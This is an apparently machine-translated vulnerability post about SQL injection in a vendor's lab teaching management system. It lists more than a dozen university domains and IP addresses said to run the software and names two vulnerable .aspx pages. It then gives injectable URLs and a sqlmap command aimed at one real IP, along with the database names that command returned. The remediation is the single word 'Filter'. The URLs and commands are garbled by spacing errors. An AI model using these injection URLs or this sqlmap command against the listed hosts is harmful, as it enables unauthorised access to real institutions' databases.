SA permission injection package in a teaching management system #3 (not repeated)
This is the "lab teaching management system"
Address: http://www.wanxinsoft.com/product1_3.asp
Some university cases using this system:
Http: // 182.129.150.10: 8001/
Http://sgjxsyzx.ecust.edu.cn/
Http: // 61.132.139.110: 8888/
Http: // 59.69.101.10/
Http://www.dzgc.cdut.edu.cn/
Http: // 202.206.48.106/
Http://aacc.cumt.edu.cn/
Http://lysyzx.hqu.edu.cn/
Http: // 210.33.29.49/
Http: // 222.204.208.4/
Http://emlab.usst.edu.cn/
Http: // 202.120.50.200/
Http://hzhlab.hytc.edu.cn/
Http://lab.hutc.zj.cn: 8090/
Http://dgdz.xzit.edu.cn
The http://labch.cumt.edu.cn: 81/
Http://lab.hutc.zj.cn: 8070 /..........
The vulnerability file is:
/Model/TwoGradePage/NewsEquipment. aspx
/Model/TwoGradePage/LookShiYanShi. aspx
Vulnerability exploitation Demonstration:
Shot 1: http: // 202.206.48.106/model/TwoGradePage/LookShiYanShi. aspx? LID = 1127 & columnId = 203
Shot 2: http: // 202.206.48.106/model/TwoGradePage/NewsEquipment. aspx? Id = 45023 & openid = 86 & columnId = 203
Sqlmap. py-u "http: // 202.206.48.106/model/TwoGradePage/NewsEquipment. aspx? Id = 45023 & openid = 86 & columnId = 203 "-- dbs
Available databases [8]:
[*] Hebmu
[*] Master
[*] Model
[*] Msdb
[*] Northwind
[*] Pubs
[*] Tempdb
[*] Uddi
Solution:
Filter